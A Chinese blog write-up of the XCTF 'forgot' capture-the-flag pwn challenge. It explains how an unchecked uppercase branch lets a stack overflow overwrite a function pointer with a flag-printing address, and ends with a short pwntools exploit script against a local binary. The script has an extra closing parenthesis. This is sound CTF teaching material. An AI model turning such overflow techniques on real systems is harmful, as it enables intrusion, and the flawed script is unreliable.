攻防世界-pwn forgot(栈内变量覆盖)

在这里插入图片描述

0x01 文件检查

在这里插入图片描述

  • 32位elf
  • 无栈保护
  • 无地址随机化

0x02 程序运行分析

在这里插入图片描述
 发现有两个输入的地方,并且第一个地方有回显。

0x03 IDA分析

在这里插入图片描述
在这里插入图片描述
 如图,阅读程序结构后,发现第二个输入点(41行)可以进行栈溢出,第88行是调用的栈里面的函数地址,所以,如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址,就可以了。
在这里插入图片描述
在这里插入图片描述
 搜索字符串,发现有关于flag的字符串,并跳转到引用该字符串的函数,发现函数直接可以获取flag,所以,这就是一个栈内部的变量覆盖。
在这里插入图片描述
 关注这个循环里面的内容,里面相当于正则表达式的判断,但是你仔细分析里switch中的函数时,可以发现没有判断大写字符的地方,我们可以注入大写字符,来达到不改变v14的值的效果。

0x04 思路分析

 可以确定的是栈上面的变量覆盖,但是覆盖地址的时候需要注意*(&v3 + --v14)这个式子,我们需要把函数地址放到这个地址上面(&v3是栈上面的地址,其计算是按照字节来计算而不是位,所以做的时候要注意计算的答案)。由于v14的初始值为1,并且里面正则判断的时候没有关于大写字符的判断,我们就可以直接写入大写字符覆盖v2,并将v3覆盖为我们需要的函数的地址,就可以拿到flag。

0x05 exp

from pwn import *
p = process('./forgot')
p.recv()
p.sendline('ShadowQ')
p.recv()
p.sendline('A'*32+p32(0x080486cc)))
p.interactive()

自己创建的网络安全公众号,欢迎各位朋友们关注!

在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值